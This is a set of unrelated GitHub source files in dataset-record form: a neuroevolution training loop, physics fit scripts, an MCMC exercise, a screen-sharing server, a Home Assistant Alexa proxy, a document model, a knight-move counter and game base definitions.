all_genomes = list(self.population.values())\n if len(challengers) == 0:\n for _ in range(10):\n challengers.append(create_challenger(None, None, 3))\n challengers.append(create_challenger(copy.deepcopy(all_genomes[0]), self.config, 7))\n\n\n for g in all_genomes: g.fitness = None #reset all fitnesses\n\n random.shuffle(all_genomes)\n # assert len(all_genomes) % num_genomes_per_run == 0\n best_won = -1\n for i in range(len(all_genomes)):\n best_won = max(fitness_function(all_genomes[i], self.config, challengers), best_won)\n\n # for g in all_genomes:\n # g.fitness *= k #ensure that staying at the top is good\n fitness_scores = [x.fitness for x in all_genomes]\n print('challenger_Assessment: ', best_won, len(challengers) - 1)\n if best_won > .7*(len(challengers)-1):\n print('ADDING NEW CHALLENGER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n best_score = max(fitness_scores)\n best_genomes = [x for x in all_genomes if x.fitness == best_score]\n # random.shuffle(best_genomes)\n # challengers.append(create_challenger(copy.deepcopy(best_genomes[0]), self.config, sim_time=7))\n 
random.shuffle(all_genomes)\n challengers.append(create_challenger(copy.deepcopy(all_genomes[0]), self.config, 7))\n\n print('fit range:: ',round(min(fitness_scores),3), '->',round(max(fitness_scores),3))\n # Gather and report statistics.\n best = None\n for g in self.population.values():\n if best is None or g.fitness > best.fitness:\n best = g\n self.reporters.post_evaluate(self.config, self.population, self.species, best)\n\n # Track the best genome ever seen.\n if self.best_genome is None or best.fitness > self.best_genome.fitness:\n self.best_genome = best\n\n if not self.config.no_fitness_termination:\n # End if the fitness threshold is reached.\n fv = self.fitness_criterion(g.fitness for g in self.population.values())\n if fv >= self.config.fitness_threshold:\n self.reporters.found_solution(self.config, self.generation, best)\n break\n\n # Create the next generation from the current generation.\n self.population = self.reproduction.reproduce(self.config, self.species,\n self.config.pop_size, self.generation)\n\n # Check for complete extinction.\n if not self.species.species:\n self.reporters.complete_extinction()\n\n # If requested by the user, create a completely new population,\n # otherwise raise an exception.\n if self.config.reset_on_extinction:\n self.population = self.reproduction.create_new(self.config.genome_type,\n self.config.genome_config,\n self.config.pop_size)\n else:\n raise CompleteExtinctionException()\n\n # Divide the new population into species.\n self.species.speciate(self.config, self.population, self.generation)\n\n self.reporters.end_generation(self.config, self.population, self.species)\n\n self.generation += 1\n\n if self.config.no_fitness_termination:\n self.reporters.found_solution(self.config, self.generation, self.best_genome)\n\n return self\n\ndef run(config_file, load_p = None, n=30):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n if load_p is not None:\n p = load_p\n else:\n p = neat.Population(config)\n # p.run = population_run\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(5))\n\n # Run for up to 300 generations.\n population = population_run(p, eval_genomes, 1, n)\n\n\n return population\n\n\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. 
This path manipulation is\n    # here so that the script will run successfully regardless of the\n    # current working directory.\n    local_dir = os.path.dirname(__file__)\n    config_path = os.path.join(local_dir, 'neat_config.ini')\n    population = None\n    population = neat.Checkpointer.restore_checkpoint(os.path.join(local_dir, 'neat-checkpoint-104'))\n    population.config.species_elitism = 2\n    population.config.compatibility_threshold = 2.3\n    # print(population.config.__dict__.keys())\n    # print(population.config.__dict__['species_elitism'])\n    # assert False\n\n    population = run(config_path, load_p= population, n=8000)\n    config = population.config\n\n\n    print(\"Saving output to out_file\")\n\n    with gzip.open('out_file', 'w', compresslevel=5) as f:\n        data = population\n        pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n    all_genomes = list(population.values())\n    all_genomes.sort(key=lambda x: x.fitness, reverse=True)\n\n    cur_simulator = simulator()\n    cur_simulator.create_ai_fighters_from_gennomes(all_genomes[:3], config)\n    cur_simulator.run_full_simulation(15, display_sim=True)\n\n\n","repo_name":"twentworth/ai_fighters","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72547322668","text":"\"\"\"This script runs the Gauss fits and returns the angles of the peaks\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os\nfrom file_management import read_file, FileData, FitResult\nfrom fit import Fit\nimport matplotlib.pyplot as plt\nfrom monke import plots, functions, latex\nfrom typing import Tuple\nfrom dataclasses import dataclass\nimport scienceplots.styles\n\npython_path = os.path.dirname(__file__)\nplt.style.use(\"science\")\nplt.rcParams[\"figure.figsize\"] = [7, 5.5]\n\n\ndef do_gauss_fits() -> pd.DataFrame:\n    \"\"\"Runs all Gauss fits and returns the angles of the fit\n    centroids in an array. All angles are returned in radians\"\"\"\n    os.chdir(python_path)\n\n    result: pd.DataFrame = pd.DataFrame([])\n    current: list[float] = []\n    theta_left: list[float] = []\n    sd_theta_left: list[float] = []\n    theta_middle: list[float] = []\n    sd_theta_middle: list[float] = []\n    theta_right: list[float] = []\n    sd_theta_right: list[float] = []\n\n    s_l: list[float] = []\n    sd_s_l: list[float] = []\n    s_m: list[float] = []\n    sd_s_m: list[float] = []\n    s_r: list[float] = []\n    sd_s_r: list[float] = []\n\n    fits: list[FileData] = read_file(\"zeeman.txt\")\n    for fit in fits:\n        current.append(float(fit.name[1:4]))\n\n        error = np.array([np.sqrt(i) if np.sqrt(i) > 1 else 1 for i in fit.data[1]]) # unscaled errors\n        fit.add_error(error / 3)\n        fit.run_fits()\n        fitres: FitResult = fit.fitresult\n        if len(fitres.x0[0]) != 3:\n            print(fitres.x0)\n            raise Exception(\"Error: the Gauss fit did not fit exactly 3 Gaussian curves\")\n\n        fig, ax = plt.subplots()\n        ax.set_xlabel(r\"$\\theta\\,/\\,^\\circ$\")\n        ax.set_ylabel(r\"Intensität $I\\,/\\,\\%$\")\n\n        ax.set_xlim(fit.plot_interval)\n        ax.errorbar(*fit.data[:2], yerr=fit.data[2], ms=3, linestyle=\"\", marker=\"o\", label=\"Messwerte\")\n        for i in fit.result:\n            out: Fit = fit.result[i]\n            data = out.get_fit_data(out.file_interval.interval, 200)\n            ax.plot(*data, label=\"Gauss-Anpassung\")\n\n        plots.legend(ax)\n\n        # ax.plot()\n        os.chdir(python_path)\n        fig.savefig(f\"../figs/gauss_{fit.name[:4]}.pdf\", dpi=200)\n        # plt.show()\n\n        theta_left.append(fitres.x0[0, 0] * np.pi / 180)\n        sd_theta_left.append(fitres.x0[1, 0] * np.pi / 180)\n        theta_middle.append(fitres.x0[0, 1] * np.pi / 180)\n        sd_theta_middle.append(fitres.x0[1, 1] * np.pi / 180)\n        theta_right.append(fitres.x0[0, 2] * np.pi / 180)\n        sd_theta_right.append(fitres.x0[1, 2] * np.pi / 180)\n\n        s_l.append(fitres.std[0, 0] * np.pi / 180)\n        sd_s_l.append(fitres.std[1, 0] * np.pi / 180)\n        s_m.append(fitres.std[0, 1] * np.pi / 180)\n        sd_s_m.append(fitres.std[1, 1] * np.pi / 180)\n        s_r.append(fitres.std[0, 2] * np.pi / 180)\n        sd_s_r.append(fitres.std[1, 2] * np.pi / 180)\n\n    result[\"I\"] = current\n    result[\"deg_l\"] = theta_left\n    result[\"deg_l_err\"] = sd_theta_left\n    result[\"deg_m\"] = theta_middle\n    result[\"deg_m_err\"] = sd_theta_middle\n    result[\"deg_r\"] = theta_right\n    result[\"deg_r_err\"] = sd_theta_right\n    result[\"sig_l\"] = s_l\n    result[\"sig_l_err\"] = sd_s_l\n    result[\"sig_m\"] = s_m\n    result[\"sig_m_err\"] = sd_s_m\n    result[\"sig_r\"] = s_r\n    result[\"sig_r_err\"] = sd_s_r\n    return result\n\n\ndef main():\n    data = do_gauss_fits()\n\n    data.to_csv(\"gauss_fits_zeeman.csv\")\n\n    ## build the table\n    data.iloc[:, 1:] *= 180/np.pi\n    with latex.Texfile(\"gauss_fits_zeeman_tabelle\", \"../protokoll/tabellen/\") as file:\n        table = latex.Textable(\"Maxima und Standardabweichungen der Gauss-Anpassungen\",\n                               \"tab:gauss_zeeman_maxima_and_std\", caption_above=True)\n        table.fig_mode = \"htb\"\n        table.add_header(\n            r\"$I / \\unit{\\ampere}$\",\n            r\"$x_\\mathrm{links} / \\unit{\\degree}$\",\n            r\"$x_\\mathrm{mitte} / \\unit{\\degree}$\",\n            r\"$x_\\mathrm{rechts} / \\unit{\\degree}$\",\n            r\"$\\sigma_\\mathrm{links} / \\unit{\\degree}$\",\n            r\"$\\sigma_\\mathrm{mitte} / \\unit{\\degree}$\",\n            r\"$\\sigma_\\mathrm{rechts} / \\unit{\\degree}$\"\n        )\n        table.add_values(\n            list(data.I),\n            (list(data.deg_l), list(data.deg_l_err)),\n            (list(data.deg_m), list(data.deg_m_err)),\n            (list(data.deg_r), list(data.deg_r_err)),\n            (list(data.sig_l), list(data.sig_l_err)),\n            (list(data.sig_m), list(data.sig_m_err)),\n            
(list(data.sig_r), list(data.sig_r_err))\n )\n file.add(table.make_figure())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GabrielRemi/P4","sub_path":"V401/python/gauss_fits_zeeman.py","file_name":"gauss_fits_zeeman.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30883823731","text":"import torch as torch\nimport torch.distributions as dist\nimport numpy as np\n\ndef get_mcmc_proposal(mu, sigma):\n \"\"\"\n INPUT:\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n\n OUTPUT:\n q_mu : instance of Distribution class, that defines a proposal for mu\n q_sigma : instance of Distribution class, that defines a proposal for sigma\n \"\"\"\n\n # YOUR CODE HERE\n # we will use the same distributions as the priors.\n\n # how do we find the prior stdv on the mean???\n # CHANGE STDEV OF DIST FIGURE IT OUT\n q_mu = dist.Normal(mu, 1)\n\n q_sigma = dist.Normal(sigma, 0.00001)\n\n return q_mu, q_sigma\n\n\ndef log_joint(mu, sigma, alpha=50, beta=0.5):\n \"\"\"\n INPUT:\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n alpha : scalar, standard deviation of Gaussian prior on mu. Default to 50\n beta : scalar, rate of exponential prior on sigma_i. Default to 0.5\n\n OUTPUT:\n log_joint: the log probability log p(mu, sigma, x | alpha, beta), scalar\n\n NOTE: For inputs where sigma <= 0, please return negative infinity!\n\n \"\"\"\n measurements = torch.FloatTensor([-27.020, 3.570, 8.191, 9.898, 9.603, 9.945, 10.056])\n assert mu.ndim == 0\n assert sigma.shape == (7,)\n\n # YOUR CODE HERE\n\n # we need to find log(p(mu join data join sigma given a and b))\n # we assume mu and sigma are independent\n for elements in sigma:\n if elements <= 0:\n return torch.tensor(-float(\"inf\"))\n\n p_sigma = dist.Exponential(rate=beta).log_prob(sigma)\n p_mu = dist.Normal(0, alpha).log_prob(mu)\n p_data = dist.Normal(mu, sigma).log_prob(measurements)\n\n return torch.sum(p_sigma) + p_mu + torch.sum(p_data)\n\ndef mcmc_step(mu, sigma, alpha=50, beta=0.5):\n \"\"\"\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n alpha : scalar, standard deviation of Gaussian prior on mu. Default to 50\n beta : scalar, rate of exponential prior on sigma_i. 
Default to 0.5\n\n    OUTPUT:\n    mu : the next value of mu in the MCMC chain\n    sigma : the next value of sigma in the MCMC chain\n    accepted : a boolean value, indicating whether the proposal was accepted\n\n    \"\"\"\n\n    accepted = False\n    q_mu, q_sigma = get_mcmc_proposal(mu, sigma)\n\n    # YOUR CODE HERE\n    # We sample from both distributions\n\n    mu_prop = q_mu.sample()\n    sigma_prop = q_sigma.sample()\n\n    q_mu_prop, q_sigma_prop = get_mcmc_proposal(mu_prop, sigma_prop)\n    logjoint_prop = log_joint(mu_prop, sigma_prop)\n    logjoint = log_joint(mu, sigma)\n\n    logsum = (\n        logjoint_prop\n        +q_mu_prop.log_prob(mu)\n        +torch.sum(q_sigma_prop.log_prob(sigma))\n        -logjoint\n        -torch.sum(q_sigma.log_prob(sigma_prop))\n        -q_mu.log_prob(mu_prop)\n    )\n    print(type(logsum), logsum)\n\n    # acceptance probability min(1, exp(log ratio)); keep it a tensor so .item() works below\n    A = torch.exp(logsum).clamp(max=1.0)\n    print(A)\n    if A.item() > np.random.rand():\n        accepted = True\n        mu = mu_prop\n        sigma = sigma_prop\n\n    return mu, sigma, accepted\n\nmeasurements = torch.FloatTensor([-27.020, 3.570, 8.191, 9.898, 9.603, 9.945, 10.056])\n\nmu_init = measurements.mean()\nsigma_init = torch.ones(7)\nmcmc_step(mu_init, sigma_init)\n","repo_name":"TheodoreWolf/Msc-Machine-Learning","sub_path":"Modules/COMP0171/7 scientists.py","file_name":"7 scientists.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26890962417","text":"import os\nimport io\nimport time\nimport signal  # needed by remove_program (os.killpg)\nimport socket\nimport struct\nimport threading\nimport json\nimport subprocess\nimport numpy as np\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom mss import mss\n\nactive_screencasts = {}\nrunning_programs = []\n\ndef capture_and_send_screen(monitor_id, server_socket, stop_event):\n    conn, _ = server_socket.accept()\n    print(f\"Client connected. Screen sharing started.\")\n    sct = mss()\n\n    # Get the monitor\n    monitor = sct.monitors[monitor_id]\n\n    while not stop_event.is_set():\n        try:\n            screen = np.array(sct.grab(monitor))\n            img = Image.fromarray(screen)\n            buf = io.BytesIO()\n            img.convert('RGB').save(buf, format='JPEG')\n            byte_im = buf.getvalue()\n\n            # Send the size of the data first\n            size = len(byte_im)\n            size = struct.pack('>L', size)\n            conn.sendall(size)\n\n            time.sleep(0.01)\n\n            # Now send the image data\n            conn.sendall(byte_im)\n            time.sleep(0.1)\n        except BrokenPipeError:\n            print(\"Client disconnected, stopping screencast.\")\n            break\n\n    server_socket.close()\n\ndef start_background(port):\n    server_socket = socket.socket()\n    server_socket.bind((\"0.0.0.0\", port))\n    server_socket.listen(0)\n\n    print(f\"Screen background service on port {port}.\")\n\n    stop_event = threading.Event()\n    screencast_thread = threading.Thread(target=handle_monitor_list_request, args=(server_socket, stop_event))\n    screencast_thread.start()\n\n    active_screencasts[port] = (screencast_thread, stop_event, server_socket)\n\ndef start_screencast(monitor_id, port):\n    server_socket = socket.socket()\n    server_socket.bind((\"0.0.0.0\", port))\n    server_socket.listen(0)\n\n    print(f\"Screen sharing service started on port {port}. 
def start_background(port):\n    server_socket = socket.socket()\n    server_socket.bind((\"0.0.0.0\", port))\n    server_socket.listen(0)\n\n    print(f\"Screen background service on port {port}.\")\n\n    stop_event = threading.Event()\n    screencast_thread = threading.Thread(target=handle_monitor_list_request, args=(server_socket, stop_event))\n    screencast_thread.start()\n\n    active_screencasts[port] = (screencast_thread, stop_event, server_socket)\n\ndef start_screencast(monitor_id, port):\n    server_socket = socket.socket()\n    server_socket.bind((\"0.0.0.0\", port))\n    server_socket.listen(0)\n\n    print(f\"Screen sharing service started on port {port}. Waiting for client connection.\")\n\n    stop_event = threading.Event()\n    screencast_thread = threading.Thread(target=capture_and_send_screen, args=(monitor_id, server_socket, stop_event))\n    screencast_thread.start()\n\n    active_screencasts[port] = (screencast_thread, stop_event, server_socket)\n\ndef stop_screencast(port):\n    if port in active_screencasts:\n        _, stop_event, server_socket = active_screencasts[port]\n        stop_event.set() # Signal the thread to stop\n        server_socket.close()\n        del active_screencasts[port]\n        print(f\"Service stopped on port {port}.\")\n    else:\n        print(f\"No active screen sharing on port {port}.\")\n\ndef list_monitors(conn):\n    monitors = mss().monitors\n    print(\"Listing monitors.\")\n    if conn:\n        monitor_list = [{\"id\": i, \"info\": monitor} for i, monitor in enumerate(monitors)]\n        conn.sendall(json.dumps(monitor_list).encode())\n    else:\n        print(monitors)\n        for i, monitor in enumerate(monitors[1:], start=1): # Exclude the first monitor as it's the \"All in One\" monitor\n            print(f\"Monitor {i}: {monitor}\")\n\ndef handle_monitor_list_request(server_socket, stop_event):\n    while not stop_event.is_set():\n        try:\n            conn, _ = server_socket.accept()\n            data = conn.recv(1024)\n            command = data.decode('utf-8').strip()\n            if command == \"list\":\n                list_monitors(conn)\n            elif command == \"add\":\n                add_program(conn)\n            elif command == \"remove\":\n                remove_program(conn)\n            conn.close()\n        except socket.error:\n            break\n    server_socket.close()\n\ndef add_last_screen():\n    time.sleep(1.5)\n    last_monitor = len(mss().monitors) - 1\n    start_screencast(int(last_monitor), 9999 + int(last_monitor))\n\ndef add_program(conn):\n    global running_programs\n    print(\"Adding screen.\")\n    monitor_serial = int(time.time())\n    command = ['nohup', './createdummy', f'serial={monitor_serial}', f'name={monitor_serial}', '&']\n    program = subprocess.Popen(command, start_new_session=True)\n    running_programs.append(program)\n    conn.sendall(str(len(running_programs)).encode())\n    add_last_screen()\n\ndef remove_program(conn):\n    global running_programs\n    print(\"Removing screen.\")\n    if running_programs:\n        program = running_programs.pop()\n        try:\n            os.killpg(os.getpgid(program.pid), signal.SIGTERM)\n        except ProcessLookupError:\n            pass\n    conn.sendall(str(len(running_programs)).encode())\n\n\ndef main():\n    def start_screencast_from_gui():\n        selected_monitor_id = monitor_var.get()\n        if selected_monitor_id == \"\":\n            messagebox.showerror(\"Error\", \"Please select a monitor before starting the screencast.\")\n            return\n        start_screencast(int(selected_monitor_id), 9999 + int(selected_monitor_id))\n\n    # Get monitor list\n    sct = mss()\n    monitors = sct.monitors\n\n    # Create a new tkinter window\n    root = tk.Tk()\n    root.geometry(\"600x300\")\n\n    # Add title to the window\n    root.title(\"VR Project - Select a Monitor\")\n\n    # Create a StringVar to hold the selected monitor ID\n    monitor_var = tk.StringVar()\n\n    
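# mss reports a combined \"all monitors\" virtual display at index 0, so the\n    # real displays start at index 1.\n    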
# Create and pack a radio button for each monitor\n    for i, monitor in enumerate(monitors[1:], start=1):\n        # Capture screenshot of the monitor\n        screenshot = sct.grab(monitor)\n        # Convert screenshot to PIL Image\n        img = Image.fromarray(np.array(screenshot))\n        # Resize the image to fit into the GUI\n        img = img.resize((150, 100), Image.LANCZOS)\n\n        # Convert PIL Image to PhotoImage\n        photo = ImageTk.PhotoImage(img)\n\n        monitor_frame = tk.Frame(root)\n        monitor_frame.pack()\n\n        monitor_label = tk.Label(monitor_frame, image=photo)\n        monitor_label.image = photo # Keep a reference to prevent garbage collection\n        monitor_label.pack(side=\"left\", padx=10, pady=10)\n\n        tk.Radiobutton(\n            monitor_frame, text=f\"Monitor {i}\", variable=monitor_var, value=i\n        ).pack(side=\"right\")\n\n    # Create and pack a start button\n    start_button = tk.Button(root, text=\"Start Screencast\", command=start_screencast_from_gui)\n    start_button.pack()\n\n    # Run the tkinter main loop\n    root.mainloop()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"RavinduTharanga/DESKTOP_VR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41905797357","text":"# coding=utf-8\n\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import Integer, Column, Text, DateTime, String\nfrom . import ModelBase, session\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom ..exceptions import Error\nfrom datetime import datetime\n\n\nclass Document(ModelBase):\n    __tablename__ = \"document\"\n\n    id = Column(Integer, primary_key=True, autoincrement=True)\n    uid = Column(Integer)\n    doc_name = Column(String(45))\n    text = Column(Text)\n    created_at = Column(DateTime, default=datetime.now)\n    updated_at = Column(DateTime, default=datetime.now, onupdate=datetime.now)\n\n    @classmethod\n    def get(cls, uid):\n        return cls.query.filter_by(uid=uid).all()\n\n    @classmethod\n    def get_content_by_doc_id(cls, doc_id):\n        doc = cls.query.filter_by(id=doc_id).one()\n        return doc.text\n\n    @classmethod\n    def add(cls, doc_data):\n        doc = cls(**doc_data)\n        session.add(doc)\n        try:\n            session.commit()\n        except IntegrityError as e:\n            if e.orig[0] == 1062:\n                raise Error(Error.DOC_EXISTED)\n        return doc\n\n    @classmethod\n    def delete(cls, doc_id):\n        doc = cls.query.filter_by(id=doc_id)\n        if doc.first():\n            doc.delete()\n            session.commit()\n        else:\n            raise Error(Error.DOC_NOT_FOUND)\n\n    @classmethod\n    def update(cls, doc_id, text):\n        doc = cls.query.filter_by(id=doc_id)\n        try:\n            doc.one().text = text\n            session.commit()\n        except NoResultFound:\n            raise Error(Error.DOC_NOT_FOUND)\n","repo_name":"docloud/docmanage","sub_path":"docmanage/docmanage/models/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36345311900","text":"import os\nimport json\nimport logging\nimport requests\n\nlogger = logging.getLogger()\n\n\nclass HomeAssistant(object):\n    def __init__(self, config):\n        self.config = config\n\n        self.session = requests.Session()\n        self.session.headers = {\n            'Authorization': f'Bearer {config.bearer_token}',\n            'content-type': 'application/json',\n            'User-Agent': self.get_user_agent()\n        }\n        self.session.verify = config.ssl_verify\n        self.session.cert = config.ssl_client\n\n    def build_url(self, endpoint):\n        return f'{self.config.url}/api/{endpoint}'\n\n    def get_user_agent(self):\n        library = \"Home Assistant Alexa Smart Home Skill\"\n        aws_region = os.environ.get(\"AWS_DEFAULT_REGION\")\n        default_user_agent = requests.utils.default_user_agent()\n        return f\"{library} - {aws_region} - {default_user_agent}\"\n\n    def get(self, endpoint):\n        r = self.session.get(self.build_url(endpoint))\n        r.raise_for_status()\n        return r.json()\n\n    def post(self, endpoint, data, wait=False):\n        read_timeout = None if wait else 0.01\n        try:\n            
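# requests accepts a (connect, read) timeout pair; the tiny read timeout\n            # lets post() return right away when the caller passed wait=False.\n            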
logger.debug(f'calling {endpoint} with {data}')\n            r = self.session.post(self.build_url(endpoint),\n                                  data=json.dumps(data),\n                                  timeout=(None, read_timeout))\n            r.raise_for_status()\n            return r.json()\n        except requests.exceptions.ReadTimeout:\n            # Allow response timeouts after request was sent\n            logger.debug(\n                f'request for {endpoint} sent without waiting for response')\n            return None\n\n\nclass Configuration(object):\n    def __init__(self, filename=None, opts_dict=None):\n        self._json = {}\n        if filename is not None:\n            with open(filename) as f:\n                self._json = json.load(f)\n\n        if opts_dict is not None:\n            self._json = opts_dict\n\n        self.url = self.get_url(self.get(['url', 'ha_url']))\n        self.ssl_verify = self.get(['ssl_verify', 'ha_cert'], default=True)\n        self.bearer_token = self.get(['bearer_token'], default='')\n        self.ssl_client = self.get(['ssl_client'], default='')\n        self.debug = self.get(['debug'], default=False)\n\n    def get(self, keys, default=None):\n        for key in keys:\n            if key in self._json:\n                return self._json[key]\n        return default\n\n    def get_url(self, url):\n        \"\"\"Returns Home Assistant base url without '/api' or trailing slash\"\"\"\n        if not url:\n            raise ValueError('Property \"url\" is missing in config')\n\n        return url.replace(\"/api\", \"\").rstrip(\"/\")\n\n\ndef event_handler(event, context):\n    config = Configuration('config.json')\n    if config.debug:\n        logger.setLevel(logging.DEBUG)\n    ha = HomeAssistant(config)\n\n    return ha.post('alexa/smart_home', event, wait=True)\n","repo_name":"mike-grant/haaska","sub_path":"haaska.py","file_name":"haaska.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":512,"dataset":"github-code","pt":"37"} +{"seq_id":"40351886508","text":"position = list(input())\nx = ord(position[0]) - 96\ny = int(position[1])\nresult = 0\n\nmoves = [(-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)]\n\n\nfor move in moves:\n    nx = x + move[0]\n    ny = y + move[1]\n    if nx < 1 or ny < 1 or nx > 8 or ny > 8:\n        continue\n    result += 1\nprint(result)
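\n# Example: for input \"a1\", x = 1 and y = 1; only the moves (1, 2) and (2, 1)\n# stay on the board, so the program prints 2.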
왕실의 나이트.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71589578029","text":"from universe.system import *\nfrom world.gun import *\nfrom world.equipment import MainMiscEquip as misc\nfrom world.equipment import Equipment\nfrom world.ship import *\n\n\nLEVEL_1 = 1\nLEVEL_2 = 2\nLEVEL_3 = 3\nLEVEL_4 = 3\nLEVEL_5 = 3\nLEVEL_6 = 3\n\nEQUIP_CLASSES_PER_LEVEL = {\n LEVEL_1: [\n Equipment.CLASS_1,\n Equipment.CLASS_4,\n Equipment.CLASS_7,\n ],\n LEVEL_2: [\n Equipment.CLASS_2,\n Equipment.CLASS_5,\n Equipment.CLASS_8,\n ],\n LEVEL_3: [\n Equipment.CLASS_3,\n Equipment.CLASS_6,\n Equipment.CLASS_9,\n ],\n LEVEL_4: [\n Equipment.CLASS_1,\n Equipment.CLASS_3,\n Equipment.CLASS_6,\n Equipment.CLASS_8,\n ],\n LEVEL_5: [\n Equipment.CLASS_2,\n Equipment.CLASS_4,\n Equipment.CLASS_7,\n Equipment.CLASS_9,\n ],\n LEVEL_6: [\n Equipment.CLASS_1,\n Equipment.CLASS_3,\n Equipment.CLASS_5,\n Equipment.CLASS_7,\n ],\n}\n\n\nclass Base(object):\n SHIPS = []\n LEVEL = None\n\n GUN = None\n GUN_LEVEL = None\n\n ENGINE = None\n ENGINE_LEVEL = None\n\n POWER = None\n POWER_LEVEL = None\n\n SHIELD = None\n SHIELD_LEVEL = None\n\n THRUSTER = None\n THRUSTER_LEVEL = None\n\n REWARD_LEVEL = None\n\n REWARD_GUN = None\n REWARD_GUN_LEVEL = None\n\n REWARD_ENGINE = None\n REWARD_ENGINE_LEVEL = None\n\n REWARD_POWER = None\n REWARD_POWER_LEVEL = None\n\n REWARD_SHIELD = None\n REWARD_SHIELD_LEVEL = None\n\n REWARD_THRUSTER = None\n REWARD_THRUSTER_LEVEL = None\n\n subclasses = []\n\n equip_items = []\n\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses.append(cls)\n\n def get_ships(self):\n return self.SHIPS\n\n def get_gun_level(self):\n if self.GUN_LEVEL:\n return self.GUN_LEVEL\n return self.LEVEL\n\n def get_engine_level(self):\n if self.ENGINE_LEVEL:\n return self.ENGINE_LEVEL\n return self.LEVEL\n\n def get_power_level(self):\n if self.POWER_LEVEL:\n return self.POWER_LEVEL\n return self.LEVEL\n\n def get_shield_level(self):\n if self.SHIELD_LEVEL:\n return self.SHIELD_LEVEL\n return self.LEVEL\n\n def get_thruster_level(self):\n if self.THRUSTER_LEVEL:\n return self.THRUSTER_LEVEL\n return self.LEVEL\n\n def get_gun_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_gun_level()]\n\n def get_engine_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_engine_level()]\n\n def get_power_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_power_level()]\n\n def get_shield_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_shield_level()]\n\n def get_thruster_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_thruster_level()]\n\n\n\n# Planet Bizmark\nclass Bizmark_base(Base):\n NAME = 'Bizmark_base'\n SYSTEM = rh_biz\n SHIPS = [\n Dagger,\n Dromader,\n Stiletto,\n ]\n\n LEVEL = LEVEL_6\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n\n# Bremen Traders\nclass rh_biz_02_Base(Base):\n NAME = 'rh_biz_02_Base'\n SYSTEM = rh_biz\n SHIPS = [\n Humpback,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Battleship\nclass rh_biz_03_Base(Base):\n NAME = 'rh_biz_03_Base'\n SYSTEM = rh_biz\n SHIPS = [\n Valkyrie,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHeavygun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# 
